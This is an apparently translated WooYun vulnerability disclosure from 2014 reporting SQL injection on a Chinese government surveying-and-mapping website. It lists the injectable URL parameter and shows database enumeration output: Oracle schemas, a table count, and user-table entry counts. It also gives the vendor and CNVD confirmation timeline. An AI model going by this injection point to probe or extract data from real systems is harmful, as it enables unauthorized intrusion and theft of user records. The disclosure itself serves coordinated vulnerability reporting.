
Vulnerability Summary

Defect ID: wooyun-2014-054150

Title: SQL injection in the Satellite Surveying and Mapping Application Center of the National Administration of Surveying, Mapping and Geoinformation

Affected vendor: Satellite Surveying and Mapping Application Center, National Administration of Surveying, Mapping and Geoinformation

Author: 雅柏菲卡

Submitted: 2014-03-25 14:35

Fixed by: 2014-05-09 14:36

Published: 2014-05-09 14:36

Vulnerability type: SQL injection

Severity: Medium

Self-assessed Rank: 8

Status: handed over to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or assistance, contact [email protected]



Vulnerability Details

Disclosure status:

2014-03-25: Details sent to the vendor; awaiting vendor response
2014-03-29: Vendor confirmed; details visible to the vendor only
2014-04-08: Details disclosed to core white hats and domain experts
2014-04-18: Details disclosed to regular white hats
2014-04-28: Details disclosed to intern white hats
2014-05-09: Details disclosed to the public

Brief description:

..

Detailed description:

....

Proof of vulnerability:

Injection point: http://www.sasmac.cn/portal_space/search.view?Submit=88952634(can be any number; when testing, remove the bracketed text together with the brackets)&condition=Search
available databases [8]:
[*] CTXSYS
[*] EXFSYS
[*] MDSYS
[*] MH_U19
[*] OLAPSYS
[*] SYS
[*] SYSTEM
[*] WMSYS
Database: MH_U19
[94 tables]
Database: MH_U19
Table: TB_UIM_USER
[3 entries]
Database: MH_U19
Table: TB_UIM_SSO_USER
[11 entries]

Suggested fix:

.................

Copyright notice: when reposting, credit the source as 雅柏菲卡@乌云


Vulnerability Response

Vendor response:

Severity: High

Vulnerability Rank: 11

Confirmed: 2014-03-29 21:49

Vendor reply:

CNVD has confirmed and reproduced the described situation, and has directly notified the website administrators as well as the website software vendor identified subsequently.

Latest status:

None yet